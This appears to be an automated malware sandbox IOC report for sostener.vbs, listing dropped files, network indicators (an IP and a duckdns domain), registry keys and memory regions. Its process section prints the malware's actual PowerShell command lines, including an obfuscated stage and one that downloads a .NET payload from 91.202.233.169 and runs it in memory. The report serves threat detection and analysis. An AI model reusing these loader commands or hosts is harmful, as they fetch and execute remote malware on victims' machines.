IOC Report
sostener.vbs

loading gif

Files

File Path
Type
Category
Malicious
sostener.vbs
Unicode text, UTF-16, little-endian text, with very long lines (10001), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tt2wolv.5lp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0ugkguh.4gx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmyv2swh.v3z.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxbjuoro.p31.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
)8"zc
malicious
http://91.202.233.169
unknown
malicious
http://91.202.233.169/Tak/Reg/Marz/DRG/R
unknown
malicious
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt
91.202.233.169
malicious
http://91.202.233.169/Tak/Reg/Marz/Ex
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3Pe.txt
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://91.202.H
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DJ1.TXT
unknown
https://aka.ms/pscore68
unknown
http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dczas.duckdns.org
89.117.23.22
malicious

IPs

IP
Domain
Country
Malicious
91.202.233.169
unknown
Russian Federation
malicious
89.117.23.22
dczas.duckdns.org
Lithuania
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
18504E7A000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
1851CFD0000
trusted library section
page read and write
malicious
3181000
trusted library allocation
page read and write
malicious
31E1000
trusted library allocation
page read and write
6A23C3E000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2757EB34000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
7FFD9B940000
trusted library allocation
page execute and read and write
2757EB43000
heap
page read and write
848CBFF000
stack
page read and write
848C2FA000
stack
page read and write
CA35BFE000
stack
page read and write
7FFD9B955000
trusted library allocation
page read and write
30F0000
heap
page read and write
CA353DE000
stack
page read and write
2757EB15000
heap
page read and write
598E000
stack
page read and write
CA3539E000
stack
page read and write
22443A7E000
heap
page read and write
6A233EE000
stack
page read and write
CA3587E000
stack
page read and write
2757F628000
heap
page read and write
573E000
stack
page read and write
6A237FE000
stack
page read and write
1851CE40000
heap
page execute and read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
185062A2000
trusted library allocation
page read and write
6A2478D000
stack
page read and write
7FFD9B970000
trusted library allocation
page read and write
CA35AFE000
stack
page read and write
2757F817000
heap
page read and write
1210000
heap
page read and write
5C5E000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
22443A29000
heap
page read and write
2757EB0F000
heap
page read and write
1250000
heap
page read and write
1850484C000
heap
page read and write
6F2E000
stack
page read and write
1851D050000
heap
page read and write
31D1000
trusted library allocation
page read and write
18502D90000
heap
page read and write
18502D94000
heap
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
224439E0000
heap
page read and write
5BF9000
trusted library allocation
page read and write
1851D02E000
heap
page read and write
105C000
stack
page read and write
2757EB42000
heap
page read and write
69AD000
stack
page read and write
18504E75000
trusted library allocation
page read and write
14F3000
heap
page read and write
3215000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
2757F811000
heap
page read and write
848C7FF000
stack
page read and write
224456EB000
trusted library allocation
page read and write
2245DAC0000
heap
page read and write
6A6C000
stack
page read and write
7FFD9B980000
trusted library allocation
page read and write
22443B60000
trusted library allocation
page read and write
13B7000
trusted library allocation
page execute and read and write
31C3000
trusted library allocation
page read and write
5E0E000
stack
page read and write
3170000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
13B2000
trusted library allocation
page read and write
3211000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
18504BE1000
trusted library allocation
page read and write
1846000
heap
page read and write
1840000
heap
page read and write
1851CD9F000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
3213000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
18502CD0000
heap
page read and write
22443AA6000
heap
page read and write
1255000
heap
page read and write
31E6000
trusted library allocation
page read and write
31CF000
trusted library allocation
page read and write
7FFD9B92A000
trusted library allocation
page read and write
2757EAE0000
heap
page read and write
2757EAB5000
heap
page read and write
22445702000
trusted library allocation
page read and write
18502D9A000
heap
page read and write
2245D95F000
heap
page read and write
69EE000
stack
page read and write
13BB000
trusted library allocation
page execute and read and write
7FFD9B774000
trusted library allocation
page read and write
2757EB57000
heap
page read and write
31E8000
trusted library allocation
page read and write
18505FD1000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
2245D9DA000
heap
page read and write
7FFD9B92A000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
848C3FE000
stack
page read and write
22443AAD000
heap
page read and write
68AC000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1380000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
18504830000
heap
page read and write
40E000
remote allocation
page execute and read and write
56FE000
stack
page read and write
6A23AB8000
stack
page read and write
CA3531E000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
31BD000
trusted library allocation
page read and write
224456F4000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
11C0000
heap
page read and write
18504A3E000
trusted library allocation
page read and write
2757EB57000
heap
page read and write
18504790000
heap
page execute and read and write
7FFD9B960000
trusted library allocation
page execute and read and write
CA357FE000
stack
page read and write
18502CC0000
heap
page read and write
5C05000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
142B000
heap
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
2757E9B0000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
18506223000
trusted library allocation
page read and write
22445705000
trusted library allocation
page read and write
22443A60000
heap
page read and write
224455D0000
heap
page execute and read and write
7FFD9B772000
trusted library allocation
page read and write
1851CDFA000
heap
page read and write
5BF6000
trusted library allocation
page read and write
2757EB81000
heap
page read and write
22445603000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
316B000
trusted library allocation
page read and write
22445741000
trusted library allocation
page read and write
13AA000
trusted library allocation
page execute and read and write
224555E1000
trusted library allocation
page read and write
2757FBE1000
heap
page read and write
1370000
trusted library allocation
page read and write
30EF000
stack
page read and write
31BA000
trusted library allocation
page read and write
1851CD51000
heap
page read and write
5ACE000
stack
page read and write
22443A6A000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
31DB000
trusted library allocation
page read and write
1159000
stack
page read and write
148B000
heap
page read and write
6C6E000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2757EB2B000
heap
page read and write
CA35B7E000
stack
page read and write
18504720000
heap
page readonly
22443B80000
trusted library allocation
page read and write
6A23B3E000
stack
page read and write
2757EB09000
heap
page read and write
2244562B000
trusted library allocation
page read and write
6A2336E000
stack
page read and write
5BD4000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
22443A20000
heap
page read and write
2757FA01000
heap
page read and write
2757EFC0000
heap
page read and write
2757EB0D000
heap
page read and write
CA358F9000
stack
page read and write
31D9000
trusted library allocation
page read and write
2757EB80000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
6A23A3B000
stack
page read and write
18514CBB000
trusted library allocation
page read and write
22443A66000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
2757EB6E000
heap
page read and write
6A232E3000
stack
page read and write
1383000
trusted library allocation
page execute and read and write
1384000
trusted library allocation
page read and write
18506216000
trusted library allocation
page read and write
1408000
heap
page read and write
2245D9C3000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
4181000
trusted library allocation
page read and write
2757EB39000
heap
page read and write
CA356FD000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
22443C5E000
heap
page read and write
18502D50000
heap
page read and write
1851CE00000
heap
page execute and read and write
1436000
heap
page read and write
18504835000
heap
page read and write
2757EAB0000
heap
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
2757EB2D000
heap
page read and write
2245D9CD000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1390000
trusted library allocation
page read and write
5740000
heap
page execute and read and write
1851CD00000
heap
page read and write
185149C1000
trusted library allocation
page read and write
2244566F000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
5636000
heap
page read and write
1851CFF0000
heap
page read and write
848C9FE000
stack
page read and write
CA35977000
stack
page read and write
2245DA90000
heap
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
31DF000
trusted library allocation
page read and write
7FFD9B959000
trusted library allocation
page read and write
22443A6C000
heap
page read and write
3217000
trusted library allocation
page read and write
31DD000
trusted library allocation
page read and write
6040000
trusted library allocation
page read and write
18504E73000
trusted library allocation
page read and write
7DF42E660000
trusted library allocation
page execute and read and write
2244573B000
trusted library allocation
page read and write
13B0000
trusted library allocation
page read and write
2757EB6E000
heap
page read and write
5E55000
heap
page read and write
1851D062000
heap
page read and write
14FB000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1851CFE0000
trusted library section
page read and write
18504730000
trusted library allocation
page read and write
15FE000
stack
page read and write
7FFD9BA10000
trusted library allocation
page read and write
224555EF000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
5E30000
heap
page read and write
18502DAC000
heap
page read and write
18504D6C000
trusted library allocation
page read and write
6A2393E000
stack
page read and write
18504710000
trusted library allocation
page read and write
CA3567E000
stack
page read and write
18502D6E000
heap
page read and write
613E000
stack
page read and write
6A2E000
stack
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
CA3577E000
stack
page read and write
18502D8C000
heap
page read and write
163E000
stack
page read and write
185030D0000
trusted library allocation
page read and write
13F0000
trusted library allocation
page read and write
1851CD24000
heap
page read and write
120E000
stack
page read and write
16DE000
stack
page read and write
1851CEE0000
heap
page read and write
7FFD9B921000
trusted library allocation
page read and write
3209000
trusted library allocation
page read and write
2757EAC0000
heap
page read and write
2245D920000
heap
page read and write
1851CDE5000
heap
page read and write
3227000
trusted library allocation
page read and write
6A239B6000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
56AB000
heap
page read and write
224439C0000
heap
page read and write
6030000
heap
page read and write
1330000
heap
page read and write
2757EA90000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
185047A0000
trusted library allocation
page read and write
55C0000
heap
page read and write
13E0000
trusted library allocation
page execute and read and write
7FFD9B9D0000
trusted library allocation
page read and write
224456FF000
trusted library allocation
page read and write
2757EB0A000
heap
page read and write
138D000
trusted library allocation
page execute and read and write
CA35A77000
stack
page read and write
7FFD9B912000
trusted library allocation
page read and write
224455E1000
trusted library allocation
page read and write
224456EE000
trusted library allocation
page read and write
1851D037000
heap
page read and write
22455651000
trusted library allocation
page read and write
31CB000
trusted library allocation
page read and write
224456F1000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1438000
heap
page read and write
13A0000
trusted library allocation
page read and write
14DE000
heap
page read and write
1851CE46000
heap
page execute and read and write
224456E8000
trusted library allocation
page read and write
6A23CBE000
stack
page read and write
185058B8000
trusted library allocation
page read and write
31FB000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
22445642000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
18502D57000
heap
page read and write
5E47000
heap
page read and write
22443B20000
heap
page read and write
2757FCE0000
heap
page read and write
2757F430000
heap
page read and write
CA35293000
stack
page read and write
848C4FE000
stack
page read and write
2245DBA0000
heap
page execute and read and write
CA359F9000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
6A238F9000
stack
page read and write
6A236FD000
stack
page read and write
7FFD9B780000
trusted library allocation
page read and write
185061EE000
trusted library allocation
page read and write
1851D3A0000
heap
page read and write
22443BA0000
trusted library allocation
page read and write
224438E0000
heap
page read and write
2245DA1E000
heap
page read and write
3160000
trusted library allocation
page read and write
6A2470E000
stack
page read and write
6A23D3B000
stack
page read and write
848CAFE000
stack
page read and write
1650000
heap
page read and write
2757EB33000
heap
page read and write
3221000
trusted library allocation
page read and write
13D0000
trusted library allocation
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
2245DAA0000
heap
page read and write
18504EB0000
trusted library allocation
page read and write
2245DA96000
heap
page execute and read and write
617F000
stack
page read and write
5A8E000
stack
page read and write
18504EB8000
trusted library allocation
page read and write
6E2C000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
2245D9F7000
heap
page read and write
5BE4000
trusted library allocation
page read and write
1400000
heap
page read and write
848CCFB000
stack
page read and write
185149D0000
trusted library allocation
page read and write
7FFD9B78B000
trusted library allocation
page read and write
18505FD7000
trusted library allocation
page read and write
22443C55000
heap
page read and write
31EB000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
22443B90000
heap
page readonly
CA35CFC000
stack
page read and write
1851CDA1000
heap
page read and write
527D000
stack
page read and write
1851D005000
heap
page read and write
224455FB000
trusted library allocation
page read and write
2757EB16000
heap
page read and write
22445AA4000
trusted library allocation
page read and write
18502DD4000
heap
page read and write
185047D0000
trusted library allocation
page read and write
6A2367E000
stack
page read and write
18514A31000
trusted library allocation
page read and write
2757EB32000
heap
page read and write
3229000
trusted library allocation
page read and write
2757EB35000
heap
page read and write
185030F5000
heap
page read and write
2757EB31000
heap
page read and write
6A23BBE000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
22443C06000
heap
page read and write
22443A5E000
heap
page read and write
4187000
trusted library allocation
page read and write
13A6000
trusted library allocation
page execute and read and write
2757EB57000
heap
page read and write
3169000
trusted library allocation
page read and write
848C6FE000
stack
page read and write
321F000
trusted library allocation
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
7FFD9B921000
trusted library allocation
page read and write
22443AA8000
heap
page read and write
18502CF0000
heap
page read and write
2245DD70000
heap
page read and write
22445C0A000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
5C10000
trusted library allocation
page read and write
6A2387E000
stack
page read and write
1850624D000
trusted library allocation
page read and write
185065ED000
trusted library allocation
page read and write
CA35C7E000
stack
page read and write
13A2000
trusted library allocation
page read and write
1768000
trusted library allocation
page read and write
6A2377E000
stack
page read and write
7FFD9B826000
trusted library allocation
page read and write
2757F811000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
6B6E000
stack
page read and write
185049C1000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
185047D2000
trusted library allocation
page read and write
7F010000
trusted library allocation
page execute and read and write
141F000
heap
page read and write
22443BD0000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
2757EB6E000
heap
page read and write
31F5000
trusted library allocation
page read and write
18506523000
trusted library allocation
page read and write
185049B0000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
22443C00000
heap
page read and write
31CD000
trusted library allocation
page read and write
1851D06C000
heap
page read and write
2245D961000
heap
page read and write
183C000
stack
page read and write
5BCE000
stack
page read and write
1657000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
320D000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
185030F0000
heap
page read and write
3120000
heap
page execute and read and write
2245D9DC000
heap
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
22445B11000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
22443C50000
heap
page read and write
18502D30000
heap
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
185065E9000
trusted library allocation
page read and write
3117000
trusted library allocation
page read and write
1851CDDD000
heap
page read and write
There are 415 hidden memdumps, click here to show them.